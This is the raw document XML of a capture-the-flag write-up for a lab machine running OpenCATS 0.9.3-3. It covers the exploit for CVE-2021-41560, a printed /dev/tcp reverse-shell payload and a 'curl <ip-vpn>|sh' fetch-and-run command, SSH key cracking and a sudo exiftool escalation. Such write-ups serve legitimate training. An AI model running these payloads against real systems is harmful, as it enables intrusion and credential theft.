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VITAE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i2hxwo6a665r"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determine the running services and identify accessible ports. To accomplish this task, we will use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 a tool specialized in network mapping and service analysis.</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95500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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completing the scan, we identified that only one web port was open: port 80. Now, we will focus our attention on the web service running on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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530600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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clicking on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"SEND YOUR RESUME"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are redirected to another application called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenCATS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a system that assists in managing the recruitment process.</w:t>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78100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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After researching OpenCATS, I found its repository on GitHub:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/opencats/OpenCATS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"CHANGELOG.MD"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> within that repository, it is possible to view the application version.</w:t>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Returning to the application, we were able to download this file and verify that the version is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.9.3-3</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76500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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version identified, we searched for vulnerabilities associated with it. Fortunately, we found a specific CVE (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-41560</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) affecting OpenCATS versions &lt;= 0.9.4, which involves </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Additionally, we have a ready-to-use exploit available at:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Nickguitar/RevCAT</w:t>
        </w:r>
      </w:hyperlink>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downloading the exploit to our local machine, we can proceed with its execution.</w:t>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21000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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this step completed, we are able to obtain a reverse shell. Since we already have a webshell, we can upgrade it to a fully interactive TTY using the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'</w:t>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embed the payload above into a file called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index.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, we will host this file using a Python server. From our webshell, we execute the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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curl &lt;ip-vpn&gt;|sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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09700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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65300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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87600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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nt0ogbl8v2p4"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1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.p69gqkqd99wb" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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2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29">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20800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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the root directory</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 we can obtain the first flag.</w:t>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58900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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retrieving the first flag, we observe the existence of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"sysadmin"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Everything indicates that we will need to perform privilege escalation to this user.</w:t>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24100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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listing the OpenCATS application files, we identified the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Inside this file, we found an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which likely belongs to the sysadmin user. We also observed that the key is encrypted, requiring specific tools to crack it — or we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RSAcrack</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46400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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key in hand, we can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RSAcrack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to break it.</w:t>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we download the tool to our local machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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both"/>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36">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3708400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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execute the tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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943100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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cracking the key, we obtain the associated password. Now we can set the appropriate permissions for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and establish an SSH connection with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysadmin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user.</w:t>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33700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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connecting as sysadmin, the next step is to escalate privileges to root in order to obtain the final flag.</w:t>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executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we observe that we have permission to execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin/exiftool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with root privileges, without needing to provide a password.</w:t>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46200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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Reference:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/exiftool/#sudo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Through the GTFOBins technique, we can copy the root flag into our home directory.</w:t>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05000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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executing the command above, we can read the root flag from our home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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I leave it as a challenge for you to obtain a root shell. Good luck 😉</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId30" w:type="default"/>
      <w:headerReference r:id="rId31" w:type="first"/>
      <w:headerReference r:id="rId32" w:type="even"/>
      <w:footerReference r:id="rId33" w:type="default"/>
      <w:footerReference r:id="rId34" w:type="first"/>
      <w:footerReference r:id="rId35"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5">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="7"/>
    <w:bookmarkEnd w:id="7"/>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5" name="image3.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.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46">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47">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7" name="image6.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image6.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Vitae</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22.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image22.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2.png"/><Relationship Id="rId21"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21.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/exiftool/#sudo" TargetMode="External"/><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3.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7.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/opencats/OpenCATS" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Nickguitar/RevCAT" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId14"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10.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.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Xj9qmSidYNMCkgWtN9lWD5HsVQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmkyaHh3bzZhNjY1cjIOaC5udDBvZ2JsOHYycDQyDmgucDY5Z3FrcWQ5OXdiMg5oLjE3NWY1Y3M5NHowbzgAciExOHRCUS1pVFdIU2NIY2ZuYWZvSm5FV2IwbEVXa21qeDY=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